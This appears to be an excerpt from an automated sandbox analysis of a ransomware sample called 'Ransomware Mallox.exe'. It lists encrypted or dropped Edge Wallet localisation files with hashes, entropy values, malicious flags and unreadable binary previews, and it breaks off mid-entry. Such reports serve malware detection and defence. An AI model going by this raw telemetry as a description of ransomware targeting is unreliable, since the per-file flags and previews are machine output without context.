                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14730
                    Entropy (8bit):7.987075449183833
                    Encrypted:false
                    SSDEEP:384:/2N7ZMU1V4zhgKfbyNfEg6UtrF35Z0moaCJJzdu0fvLN6LVqmt9akIMy2:aZT1V472NfEgTtJT0lXU0ILh99y2
                    MD5:8284CDF5BD962BB7079D7A8063348608
                    SHA1:AF304373555790D75FEF9CE88D483182582D51A8
                    SHA-256:7696462FD74691F84DDA06C75324FD1508D2C917F78950956A246AF279701169
                    SHA-512:1A7C671874EBD02B1AAC822A97A6AB6ABE63D27DB839AF0161ED41C039B6BFAB0288B33A42E369BDDC8C88D88775B2DFA037F448456CCE72486A2E5AC699074E
                    Malicious:false
                    Preview:h.....=R+L...P..dT}(..;.......(<.^a.\2z.J.m.....'g..H...Z......+f....G%.]^..A..ST.1f......d.Qi;U...0...\I..w.......3.+S.....j....p......I5'.!.e..b.".....\(.+.C.jxG...$H ..-....Z...X3/.h.B.ja....9.....Sn..oO3~....6..H............bz^g......n..o'{.n..9 F. F+..d.).i.-.a.-SM....4=..u...vn;..w....?...&]:.-..@... .:....#..=....u+l P4..M.v.)6M.X....6....x'...ul..9.v....O...:g.H..........h...>..F...D..A.....s.a9..eU...!.~E....4.....N8.u.g...:..u...r.b.\..+..#.7..~......k.||........Ww\#....U.5.L[?..y..........O.-.9_%.:.U..2...8..(..b.NK3.(}.A..)..K}....b...o.~..-.-*. .,t...M.'rE..!.5..A.G.>....E.....1R.....k.v...@6nQ.Ox...E*.c.......:..^R...R...jm){.}j.I....f,....}=.s.z.$.Pu....d.'*..h....^A...#..$.uR..=.e.|y.3..#.<ME...7V...,It.y.C...M...%P.I2..[T...C8.RPy0^...2.v.O/.v(.`....:..>...o.;....b.f3.F..|K.@.<......J....i....8c.dYF....F..M../>.....6...=.@.tru.Y|..&...zs;.._....S}..]?.g..(......B..tp.R.F3.....<...{.SV._..#......._-...I.`....%KO.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ru\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):20589
                    Entropy (8bit):7.992121961873733
                    Encrypted:true
                    SSDEEP:384:pZO/ehLo0ZVIsZ2V5S7RMdL+3vdQ5/O9pSDqm54fcOZvUao8zM:pZO/eHMsZUYRMdK1z1m2fcOZ3Y
                    MD5:B2D9FFD5DBC4AC3111369598D87A76A8
                    SHA1:69ABCEE87667DA21D758E0A1B6B1130A26B23503
                    SHA-256:90F40E5311AFBF7192C5A94D4B2E30D068F227CEFDBE0890D70262D1319FEA56
                    SHA-512:401100A5992CA097836EB5287B3AD71CC53448E4B983A5EB54358C3B1D9B1169414B2859CB079F607DD97C279ABF9A7A18F5908D56617EC961E78FCBADA41AB0
                    Malicious:true
                    Preview:...'.....I..S...sR.,';..i.....|..~.w.g'...<N.HW4.y..^.,mC...G.q...n);..k.{...+'.<.}.\%...i.....k]....F..Ey..FW.'ik~-.WLfF....>.@...J..q.<..h..nY.N.....]qE.....0...r..K.h...Gq..|D..0.D.Q;.4.,E.V&...j..<.|.*.?.....l<..[....Fv...%.v.%\.#..y.5...yY.\g.,..8R=.X#.[...&..(x...(Y..O.>".1.....+...F$7.1|.jh..#!.7.G.....'.V.A.Bvc.J..1.U.........q...`....T.]?...dI.j..N........._.grh.`.o....:`...d.\...2(.R.z.....g...A=BPF;...i..D...Py?..J...n........C...^..V.H.'Gp......d.-%. d.Xi.......9Y$.R.r*.<.R3*s.0....rj..=k..G:..W.+.'..9......6.........5.H.=&...........*....H3.w..m..[...TLW......G...&."..Q!...Kj.;..m~.q.OF._m....8R.Kr.....l..l..`E.a.+.f..kf..........*."}".S.....*.W.s.....[....w.7...-....<..(l-..]7N..nZMb8.xHv..D....M~jA_].a..[...K......".Zu.&._.k..K..d....m...0&....\K...-vQen...-Y.s+.X..p...I....".a....._?..O._.2...@*[<.{jE..........:p........ft.d|.9....1.@.~.[$R..Xm.2.o2...Y.P..e.(orK..|`...-."..IX..]0..Y.....B.n..s.Q.kL.N..x0Va:].w.*#.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\sv\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):14286
                    Entropy (8bit):7.9889656024497055
                    Encrypted:false
                    SSDEEP:384:jlQEH9TEO9DFurZOJor1fP1JbaBW9f5TWc:jJdTEk6ZOJodPbdp5x
                    MD5:081B2898396897DCD3598FFA9562E2A1
                    SHA1:6DFF5EDC2F3628F95B69981063E581AC9255FEAC
                    SHA-256:E54C899969DFF3AFA92694F91106FB2BFDFBFC6A1C406781092BC8779F34B733
                    SHA-512:729E113B67F1E6153936EC25BB8080DB49B0C3A66DB85FE0A6BD658501C8E8FBA60167891B90C6D39C6806E59C575BAADDDC07A3FADEB66B96AE755E490BB399
                    Malicious:false
                    Preview:..v..^.;.... ..$...j.~u.........d.v$...|......~,1...!.3_u....A.o..p..&+.u.qCB...e../.d*..N...J.j.8R.B.Ry8......%.FY..=.....1",.Yb..<.Eu...a=.30.^.%Ky4QD..W..%F.....q.....m.$.y>...N.....i..;"b..K....=C]...6..:Zk..D..E.W...T.......W%..!i.T...<....))y.f.N.....O.....:...i...9..S...c..(..)...z...I...z.q.!......d.......J...E{.Y..W}...o*L...u..rp...j.@B.c...7..{..!..8..G..w.Ug....Tx^M.....m.....K,...[!v.*..~2..P...H!...r...2.....p.j..'M...\......Kt`..rT.:...c-.9...{UpI>.".]....F=...Vu....C.gT.]..K....h.......KK.T..^...Br.~b'..N.r.8#..uh,?.BL..rD....`.R.......'...J9#3......."+...w.q.l.Y>NK..)?....^g.j.%.?.1..6.,.....8...~....6.0c.S.Qv....V)^x=S..r.j..1..ci:a...Q.2...1a.F.8.]..s.Wc.... ....Q.vf.8..Tw\.~[.t.|#1.yV..?.!....& ."l..I....^V ..b.~..l.NO.y.U.|<#.F3.f+.u..........m)Y$.z......M...nA.C...+...d.}.OD..U.]..u....\>.pe.xa.K.<.E....;}.d&..L.HA....h..9b.'..j..HC^.g".#.i&.:L..i..?k...S..`../.=...+..)..iw.,.TvE$....!.....T..<..[4.......fh..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\zh-Hans\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):12982
                    Entropy (8bit):7.987081752672112
                    Encrypted:false
                    SSDEEP:192:/cSexonJSDpTAIN56QNgAjAIN1BivThPVqiX41FTxRo7MBXGGqnpMp8I0ooY3Vbg:ESLJYT6eGINkXqiCtBXGG8pMiI0S0b
                    MD5:C748AFC167BA9BB0C83B08F52BEA1BAF
                    SHA1:28DEA46BADAB3C2E20AFBA69C3E0B784DA2A87BC
                    SHA-256:6F51A3C144AECEF624C0B62C8292B73403C841FBA7BD48E236067BC2B4966368
                    SHA-512:3D82427EE01A5A2905D3EE9917D02D659624A06EA4496B498C9B09033EF250052A8C5EADCE9433A7BB5277AF275723FB4ED6F3EA5EE570D63AB38EA6476CCEF0
                    Malicious:false
                    Preview:.!...@..C..L.....!.Z<.*#..|....P..[.......>Y.)...SN...D..j$...=R.J.p...38*.D.o...Qr..........)=....W..{..Q..K:Y..'j.B..l....x.S.q.M.TR..l.....T.....M.U?H..#={6.v......v.....e.W.H#p..H......OL-..~."f..\.&..T...J...%4\.|.:..E......Z..-........N. ..).wP......(.~.&..5.k.Vv./=4....[...al..x{.....d.HT6~..........&.(......c...3k....y.."..FX.+L.j8<.. h9..|.2....-b.d......;..? ...U.W.~...j.O+ ..;.*N.#e..].4..2c}~...c.gj.#...%.t.......,#...m....^...=....~..../prvx..UL..64........|eF...u...5t.Z..._..).'..TB..T..8...`Ov.9J...9w...!&i..ieP.y."j....uF`.>&.0/....{...~\..-.....~.^,!.p....q...#.Xub(z..T.;.(...\...a.hj..d..M|?.3.6.@..O.C.,=W.#..../!....i...Y=;.....&-.ML.........AN...o...............j...%.1.=u..U.T.!~k..&..{..A.IG.T.'\..E.GS+#....$u $....U.......$...w4.=6.....j....yE.P.d.fk0.P....V.......'.x........l....d=;7.">S.7sV....2..v....?2>..Z..:Y].D.L.:...d.{3.m.M...P.'....+..........".*..~.l.....{..4.9.9...X....X.v.D...P....8..:.&

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\zh-Hant\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):13437
                    Entropy (8bit):7.987046893770918
                    Encrypted:false
                    SSDEEP:384:fPP5ldA3+rHBWtgGbrWaVKBwj0+S3GRf4gy1z:ZA2HBWtgGbrxVKI03GFHy1z
                    MD5:1802FD1288607768A4E98B80C12F5417
                    SHA1:137B35959D32C8A72CB03977E490CB051D5B7D27
                    SHA-256:CED3D40C920ECCBE04CD969B1E685E08CFBBC2D78DBCAE5145F2584705541E15
                    SHA-512:BBB6E679A533D899866BFFD7F99D661B5AB576D2D8FF4C085D13E28599094B58D04ACFD58F96B7BA7E7E57F798F0E170F6997EFC2F3B1623AD9D7F5F525DB26E
                    Malicious:false
                    Preview:....E.f"...S.....o[.....S.e.`6..u4.d...@..j.%...FF{..h..3e...).[7-...:.}.Wj..5Q..&f...6.mqRm4.Ok.xV.........\..GH....m.-TLl....K.|.zFD+..-.q....J....h...(N..)*.....Q.I\..@N8v.F.&,..g .p.S.)w{....%&.!.....&....c:[.V..$`w..N...7Y't..~..'h.H7.$.i......'..Kam.~..p......,......N....f....h...w.B)CE.u.};/.C.0"`.:k...G.R....w..wr..`.+.(`.qs...;....O..$.....o..l..&[..o...TD....../}.bLR.0..q.....w.\...S.X./\4hT1..0...q..Yz.|..O...0.`Z.hO<...OY$.....zFr~d.....6..Q...U]..J...'...g..L.z.+..i6N<..../....=...O..rI.>.\P.M6........q.xi...K4..f7..........B..4.9.....B:.r.....l.^+m&...C...".~\wLJ....A.l.....O.+o.8.+....0;W(...pY..Tr.........>V. ..M.:A.;....}.. _.....s..]>..\...t.,.?.......a...t^5..[.)|8...7..NJ..3h.....q..H2.'..}.k,\..B..~..t....F..........h.u........:.w/..."W.0=./....mz{<.M.p;..@W.*.)...wIaI.0.-].....]..s'.ww9. ...'..............o<.|..1.(.I.:....iwF...[.D.v.w..)....I(.....ZG.BCV.;..P1.Yo...].."b....1.\.T.u.....=..k/.q.:.E..p.~...>..f.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ar\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:DOS executable (COM)
                    Category:dropped
                    Size (bytes):73398
                    Entropy (8bit):7.997485082806188
                    Encrypted:true
                    SSDEEP:1536:nORLWs2RAE1M+Z8pvtrCd0WIIXe8D05wTRpVCA6d/uBmqb:OBWs27RctezIIXgu1pr6d/uBme
                    MD5:B1B9AB89B7894BD8CDBA83C6F8620D19
                    SHA1:3F931D99399E2B5396ED308813CB3269D494ED97
                    SHA-256:76BD8FB16C6A48A9B20D4AD176BE63B6CD528365AD97C234C60791A2F5E4D03C
                    SHA-512:58B7F0C312A3DE9BAD60F8730460DA7B9DE3660F3D2949DEDF96A67CD16540838AB0CC1FD11A04E1A2E29FE0B82DF53393352DBE6516C6C964D16A980CA14782
                    Malicious:true
                    Preview:.d.0D#6.#2".~.E..wx..Xu.....aG.I..N..%Og.|.N.i;.#..O....6JPr-........'.%.k.@QF...3|.....o.~l......zd......[ .;....Y%.W.................X.5H9........X....Q.0[.............g..#......2T... .`...v.........rY.6'.....;.^.koI.}..W...U.S.......pT....V.K`.aE..Y....I.a.<..^..+v.?..#.4..{i8.}.t.f"..,+.......?.ilc.?.L:.E.T.N..;B.....|y..).w.e_...f.t...|Q.B....;:..x...b.a.....n......U.......#.1.`La..v...3.JPf.3.K+F...H...zF.0c..-..|......e......4....z...[...Z]=oN.B.......%.)..t2......V.V.7......pW..I....A....].P......J.....h.1,...Z\.../...x\.Ft.Wg.!..a.Fl.P..&.........`Bss.U......+:....M.A...I.d.j&+?....(.Bd.*3c..F..... ...c.5...r.;u*...*X..u..5.t....1.dq.......?...R....{]..]L.P96...5.n.u.o.qm...4.+.iAS...p..Q....T.Q.+(..t.n..aU.W..L.c..V.*c.k. Z.v...k.C.'Y..(]...%q.n%S..'....W.....c.#F..x.@y...5q..L!1..:.....*.(..v.X..C.S.q.2bj:...........|..u....~....X.x..S....p..c.2..Wu...E....A~"......R9.M..Z...L...u.7....~......Y.....M6..dle..

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\de\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):63463
                    Entropy (8bit):7.997305096314498
                    Encrypted:true
                    SSDEEP:768:7m9fI7UWRva3VAche/nmEF0mtSlDauKv1+Bsz++rIdV9NPbLFSAIduSpOKc9VskR:7m8jiu+6101aKD+MdV7LFSFW9+UHRt
                    MD5:705C7E068F82A89E7212E0DFF427AB9C
                    SHA1:6E763181F5CB7B252D0F4BC809D7CC217C318D46
                    SHA-256:E6722FEC9E052EA0E2DFA8FCE6360BAF40096C22609B88049ABF30E2FA37731B
                    SHA-512:248E73ED1B22D33AB406EB204D1FEC42374F5BA9BC2F247AF673DC642F4BA981CD7EBB79D905BD4C8ECD42C53C6C27BC4C207628C1094B1AD23284C99146BE1F
                    Malicious:true
                    Preview:...}...c.qBju._./F..&.*.&.V..Y.?..]G4C.u..5.yLt.Ah...q....D...O.{...5.....W..U..8...9.37....z.2..H..B...CC....Z.j..L...t..48...=X..I+ ....p\...!ac...o..]...r.....`B..?......8...#....2..c.....+.g.....K....-..+~@4.......N....Y m.+....;.M.F8i.{...0~.|uN....//Y...n$.*A...sd.6....=...n.2`.......m.D.|..H..A......?%.z._5.\.. D.....+MMz....V...6. i.....I..c.Y)<..K9....P.z..f..B....?.DTH:....r....mst...(O.jq...76s....Ip.......Y....&...W.Y..H.?.*.Y .wV....U.6...h..,b.7...[.).C<.<X.3G.>.\.-b....O:.A..?......@.G...".....tm..&.y..o../......<....u.0,..._bL(.".P.....o..y..M.k.h..~x......23.K...h:./.`..5._..h...K..N....3N..>...I..."i.fgS..S.....P....gt.0.l.8F;v.6..4E..........jQ....3...x3....@d.>V...F.Z.FF.......k..4y.+.?..............E.eL..'z.....ik..f.J[.f.~/~V.....p=..]..8..u...I.B.$..d>83..I&..+...;*6..?.. ..ci.D...+..D5!..,...f...A.0...UY....R....H.).o.....Jy......l.;.v.z?B-).V.. ....d.".......2.....@.d..g.Fg]...u.ik...`f..Vi..X.pi.x..])U\o"_d7]m.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\en-GB\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):54686
                    Entropy (8bit):7.996968507493538
                    Encrypted:true
                    SSDEEP:768:yI+GzlxfySueFgGxvXHgNeFBRDRj+sjJz2Fec1fedUsjUrzPJBhywJa8O/:tnPxjaeF7Rwl2bYfhLJ3i
                    MD5:C54041B0467786806CCA3D23E353E28D
                    SHA1:A634AFAD2DEC125147715D6D2144F4DC983AEFB8
                    SHA-256:899E7B84E85E267409AD31B8F984F49812CD617759785E2CA19675A378CDC4A1
                    SHA-512:FAE0BEF3192C0165FEECFC00414134728E0FA4ADABB3EFE12610814C4EC9D355CF4BE80081286C8D0CE765B0CC3A0F90CD1B4503B25DA1353F9AD8CF379BAA50
                    Malicious:true
                    Preview:...q.I..iw~.b.{..t..kqj]..,(.....~.7.R...T...).........&n........^Z......5.0..r..f..V$f*h.....>...o.(O.{Qf:..{.=$..fhx.FM..@6.7.lK..y^<....& ...g.. .!%.].......7.....U.=.x.Uo.B...WpN.LiD..;...w..Q..f..a...gL..f..b.....z.p..;:F`wUh.4$c....6..%P......R..Wqo.].@.h......^_.I....1...-Wu.%.6......lE..?..p...x.2.h...g6..=...~. *BBl.j.G..N.!. .t..Tu{r.h.D.&e..X.........oV.-j.....P..9......a..q.Tq......>..Q>k...E..(}...z.K..H..;..2-.@......q..?.8jZ...p.l...W.0p#.[.^.%...,31E.(."..\!^..S....H..S.2.....0..u..1.Z...]...d."..2=.;4FI.A....>..i.B..L.....n..n!p....F.7..w...%.^...!.*s._.n...Zb...p1...9...N....g.c.......L",f.i..l.s.%+..4q...[......F.G9..95h.....a.C..... ..u+kGzP........].~g.eg.X.E.|..>....1.[&..)....".l..9....$.[l...&...1...hS$..*...y...........+.;a@...t...B..u.7VEYO..8[..f.H..\$GNW.&.....9.(.....X..{......p..C.:.I>5.....P...@a....;...Rp.>;..8c.YL.w}.....Z.m^J.....Zv.d?M..a...@.......fs.^3.........`...C....W..C...).......H.<.,...y.d.3....r.

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\es\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):61052
                    Entropy (8bit):7.997110739626145
                    Encrypted:true
                    SSDEEP:1536:4xoUaW6wT1mXfp1s61q02EZqPcdIhGBbRmuq8TMh:6pJqzqkA343lMh
                    MD5:5CF0B1509014934AB56F9DFEF17F6F1D
                    SHA1:89052BBFF74A5333BBDCC4C90551B1E3346267DD
                    SHA-256:59968129135B5CFD960C50EA34E77370427E6AA5F9CB6520A502E4CCBC40EF6C
                    SHA-512:03C0B2C0C38BF6E73E9C4CB5D2B7280F8635092B25B7D244136AD2F95D7C8A6B0968DD6CCBFB6A2AA0A17F03770BB88852ACC33EC9F67760C5022BA948DCDA7A
                    Malicious:true
                    Preview:....n..;b....M.."..P.n5ol.N.6....=7X...4.....W.>wT.d...w..Tl...|B...v......a>x7K...1.e...P. ..39.../.3`..r..m..K.W.F.8.rNd9.>C;...........mJ.......p...#I.Q..........+..S6h..."(.*......}...R.uL...i..b.:...\......-.....4........B...@0.H$<..R.../...%..#D#T.D.lJc.=..@...p....&....x.../..&..9..$.d>_J......3..x.5...kR...z9.)_g..q.d-...Z..X<.u.>..pvi.x?.$......T..>....,i'..&...Xg(?&@c19x.n+....X.......adU.......R..L..C.0....-..}.:I..Ln..J......b._.....a\..#......+.$./....|......u.1.Q.i...}./...........)..i..x.i.^|.,...W......e.1.O.owt..e..!uj.&E.yN.....F...o t. ....M.k..;...2.h"........c....F.....^.].....K.9.6..1...wj.n.0.L..Y>9y)......DG.N...v.0.F...yDtb\.a.....5..Du..J.P.+J].`..@.'.Ll.@$FX!.(<..".^H5~.j#e.9X.g...oZU..~.......BAX$.h........4x.......5.5....8.|...+.....b.oz..).z.T)I..........x.v.G...rt.hqX~(.,Aqm...R....r..A....|xE.er......N.......9..m.7@.r_......SZ7....z)`..A...=.m:D.5...aq..H..W...g.....@....\?.z..h...E.6

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr-CA\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:OpenPGP Public Key
                    Category:dropped
                    Size (bytes):64765
                    Entropy (8bit):7.997087639559998
                    Encrypted:true
                    SSDEEP:1536:M5p1yxYOw4RdE635NPyyt2n6GIINwJbBgxG4sXof:qp1yW4Q8x2VTilg9f
                    MD5:38649175DF2723CF5A06C8AB7ABE591C
                    SHA1:0E1C4C608C08210B418A46C0F7B3A7C992F7BE66
                    SHA-256:56D754FDD10881309BF442F910B7EF5796331F550C3E6F5B4D8ED8FEB0D8F57B
                    SHA-512:5E8E02A6F6095073F8E1A33774C1CE1F237DF08EDDAAA5D97238BFB7968E163C3BD6C19694ADC1B30AE06D0A9B46DDC98D4BFD68329482AE9D49F5A19ADD9365
                    Malicious:true
                    Preview:...JO..5y.g.../#.m3n..`....J..........B..hjP?'Ri.0.q$..<.A.I..%..f..=b...~...aJN.]r..w......5ca6..wE......X.gk....4$...G..e.].X......3.^.1.!dh.%.B....8..\...t..._&CU.[.`.C...GEC .Q.W.....B...q..e...!C9.S%ju........~..<.b.....q..^...e...Bl!E.0.4.?P7.(...uE..O...|..B.7<..F>!=..(/.."....^..`...Y..O.c..6...}W...Ty.c.Z[.s.%.r1.4.J..6.V.*.~._..B.>......h.?y...M.-.......'....G..1....,"...{....._.y..g.A^0tk.b......q_-<K..>:...U.N...Kd.7.CS.AZ...D...C.r..{5*..,......v.^.....ss...l..-...G....v.G....;$.x$..Ak......s@..@.C.h~k.".e.lR.8>...r......O........|.....jx...M...*?l.R.]e\.....'...6...).....XQ_y.><.w.p?|...(..%....q...x.#.Bj..G}.B.w5G..K..?.Kk..j> .W..=}./..1..$.).|..B....4;l....k./tY[.....N...E.[...4.l.X.O..l............Y,[.l.h_].tTAH.^k....`..I..d:.]A....?..@. .Pg&^.%...[...3A..f......T&M:..{.Hu.c"......\@.pu..%..T..E.d`.?K=.&.?5.E...F.Ll.K......>.m...6.....9.0..n..'.....K...j..4Qx..Z..>Vf.....2..*0}..t...z...,.!.A3..P.+a'1.O!....0E.r..c....

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):64757
                    Entropy (8bit):7.996916377569866
                    Encrypted:true
                    SSDEEP:1536:z/Bd1eWFkNRwmdaUSfTgx3laUwO22Mp8udNuMi05NN4YGq2NtK:zpd1eWeXFda3fTgJlCO26ujuMi05vp5V
                    MD5:0EFEAA018FFFF773CAF870B130045C5E
                    SHA1:3665FC8C8060DE99D5232ADE208C31E27CF5FC33
                    SHA-256:5324E3BD69241938B867BD0BB4954F1C4EF447A009D13DAECD69C78A598AD32B
                    SHA-512:9F7D53DC535A7C919DCC5F5D593E5EF7039547813642D41447570C8A6EA2A9022AAA0F378272D70FA75A8EBBBE9A4D2ADF73649AF3F08E265FB5925A024EB815
                    Malicious:true
                    Preview:kTW. .y&..,.g.}.l3z..D.6.......t.L._D.9a.a...h3.#...B.yN.p@...s.qAT.7..W..4(b.y.1.'s5...v".CO.Q`.G..NI.g.....&o.OQ/.....1u=..n.....R."....;...ni.r.........0br........b`..#...A.Y<.)..K....w.O...b..3.|.Eyp...4.[j>...>.T...u.D...eE.....+..u..SF.nU..s...........x......p.Y'.P.y..}....~.8....Fo..+~!~.......y.z..4.4.....P.3...2.~......8P..y..... .{.u..iM\.n.f...W=0Q.Aw...L...jcD.i..0..x.....t...i...J...>..D.....m.:*.&c.z..:..;....s.$a...l. .8...... d...(.b#g.....XvZ.{/....l'.0h.D...&.zo.......D...;..$..b.m-.+..4)...|<I..a\...G....xRg.j{....|bk..\H.@..5X(..gS*....&.S`.89B...B....z....8T..3'^.{..T?I....^>$.......u....X..+.>...k.J.Y9..._X..<R.C.fW...w....g&!...N.Fz..o.@.N....1"....+...s......N.'.....,^....9..Oo.........kH..x..c.......e8.%.wTE..Vy..+f.5.-zX'.)C..|.Z.zR..........d.~.....eA..<*<....i.......MmNl./...,.60?.w.....*<.9..............H./v...|....m'..{N7.......x..>...5.jM5)'...0?.j.'6..=.G8Z.....E/.V.I...^+.D=...K&R..Y..fb3.......

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\id\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):58181
                    Entropy (8bit):7.996888355527411
                    Encrypted:true
                    SSDEEP:1536:F9HfDeIuT/IvbMO1xKz/UXUJUJm04NIuXQQ5G+jWs:F9HaIuabRxKLeUCMF6wvvWs
                    MD5:2BBFFABB727B60DC8EF229422739A280
                    SHA1:32DC20908A360C4AEF348479059493F53983A327
                    SHA-256:F98D962DD85C7E31964466BA9D2990D97B6DF0DC81019C56CD2D94897FEB69EB
                    SHA-512:E613799F1AACF2E09DEF0D97B8974B7657F580DAE268530BD7544E7924E76253093D81971D73C4813F6001C420EE4FCAF20DD875B92D7B61AB881D616CBB3DF2
                    Malicious:true
                    Preview:G....,d9..dH.e..SHa..JW.05.,.......#.H*....0_.:.....1=..X..C.....%7..b.c`... Q...\'.X....x {.@.9...f..xF..%."G..m.....yfi.L.@.%.......mv.......1+...2.?.S.x.C.... i...aN..5..y..l....h98.a..'.<(...I...\J.....<)Hn.0!.&.0%......[.......Y.....Q..V........b..o...KMX..\.]..b............QK..YcJC......Tq..T..1.....A...Q......1z%....i....$..r....Z=k.#]j..i5.f.C..`..i.N...L9....A1W...*y..&*H.}...!.....G....:..6_-@...c...PZs)....w.#.....q.,....%.=N.V..5.8e....f.L..4.j...........h.....#.....'L....?"%.:..$.........A...pI>.... .d:B.G.1.mb...Y..l6p.q@...<...g....i....AMF.J..B...... .!gE.^...5u..1..,.:..U......R{..$.d:.p~........$..R0.s.......$..&....h.X..a{..aA%.0.V......g4..2.......^.."%-g7lB..]<......wiS....y(..b.S..#.ht./~..h,.[....E..nT....h.u.) .`(..'S..m..XT|.UF......qI..".D....D......"..o.J.F.n.:.("c..O...........t...<.{.<#...*M..i...[ .G.[..o...jB...X\..........9V.....7k..F7n...>w.....Q....+....0..{...F.8............:./J.-....!.kM....Y.k.EN;o

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\it\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:OpenPGP Public Key
                    Category:dropped
                    Size (bytes):60729
                    Entropy (8bit):7.996833329901674
                    Encrypted:true
                    SSDEEP:1536:NvhSYxZvS9LSNkNTH8TPuJ9GtDDFughId2gsCm:DNUT8ujAugadU9
                    MD5:C7D90DDCFD5998EADC7C9AFEC0EFEA9C
                    SHA1:C08B9AD4B0AC20977E27B6AF74C4D668379A1396
                    SHA-256:2F0E9DAC314E616CF8C5C3653F94976BDB281DAA546348838A0321199BB0FEF8
                    SHA-512:91A8A6C29E6262875F6E3798749F6867AD8A3ECCAF061D2A3AE0319CEAA0E5212FA20BC9FDE13B8E0E6FE191B677A46910D6CD11909FB0FEBF942D2D445B96A6
                    Malicious:true
                    Preview:.W...l......-.!...fA..:.0......~2........m.9..._...g7q..a.#...S_...jU.m.ik..z2...n.H.......I.$X..&..n....C.]2...)..v.5y.j.F4v=...]c@.bI...q..R...6)..E.3Jq....m_..{f....iiB.....v..../..WL.:+...l.YHqP..g..........U...J...q,...n. .-./.._d.`U..>W...+. c.?m..'.FUIfk...I..4&^O...\.F[^...f.!j..>i,.t..FeZ.F.".8z..cO.<.A..U.6..f.=....wv9F,....dcM.X..P.82..T.C..A...B..[.......^|.z..D.p.....Z..\..".>...uT..d...v:.d...W...!.y<^.V/..Y..=.}...WD.)...E.y...[p.LY..U%......y.Z..O..q.=..CZ={...v..u.n..+.)...-.(..Z4|..<....u...r..(^!...mF.......[.n..]..\......?F.'ra.....7;...G!...(...(......F..!m&...X....%.D.]D.....I..Sn...V0......(.."............'y.../S.....<...._.........RZ.._)/X...'./^n&..xH.4..h....`.~`.g..t..5.>...3.n.*.+.8=...=..V&..)B..7.....(...w{.h..K...Y...c..1....+D......]..(.......@4k.....^...S....K|)..F-.&t%...9ow...-...Q..@..3 [.K.W...%....(.....C6.*.!.J.<..B....|...u.$|..n.Z.*.+.2.{..2SZ.......`Nq%Z.....$e..^..1......b..)/..z....pjL

                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ja\strings.json

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):69552
                    Entropy (8bit):7.997460215093233
                    Encrypted:true
                    SSDEEP:1536:HSx5hqmo+kRMXX0+nYJ/8+8ZqZXVbbOdo4MENO7m0YvXq:H653o+kN+nec8ZFbbOGZMQMvXq
                    MD5:F97FE06A5FD3B2E888B5F45BF99CEC82
                    SHA1:B5F83C4E8233B9A6FAA62AA0DF2757639AE0D73D
                    SHA-256:E24FE2178CF65F26D03A083F0E3A2B334DF81885F51EB82EBFCD02D55825D8E1
                    SHA-512:4E46FE3BA0923AAFC8E359A50E428A04C5DB902D0F1AAF6616A4D860DFE4D0304219FEC9B9E7C79FC639E6AA18905F6EB0D1C006C7DC9820196842A02C97DB64
                    Malicious:true
